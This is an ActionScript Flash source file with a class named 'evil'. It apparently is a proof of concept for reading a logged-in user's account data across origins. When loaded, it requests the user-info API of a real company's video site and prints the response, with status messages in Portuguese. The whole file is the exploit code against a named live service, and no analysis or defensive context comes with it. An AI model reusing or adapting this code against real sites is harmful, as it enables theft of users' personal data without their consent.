package {
    import flash.display.Sprite;
    import flash.net.URLLoader;
    import flash.net.URLRequest;
    import flash.events.Event;
    import flash.text.TextField;
    import flash.text.TextFormat;

    public class evil extends Sprite {
        private var textField:TextField;

        public function evil() {
            textField = new TextField();
            textField.width = 800;
            textField.height = 600;
            textField.defaultTextFormat = new TextFormat("Arial", 16);
            textField.text = "Enviando requisição para a API da Ferrero...";
            addChild(textField);

            var request:URLRequest = new URLRequest("https://vod.ferrerorocher.com/api/userinfo");
            var loader:URLLoader = new URLLoader();
            loader.addEventListener(Event.COMPLETE, onComplete);
            loader.load(request);
        }

        private function onComplete(e:Event):void {
            textField.text = "Resposta recebida:\n\n" + e.target.data;
        }
    }
}
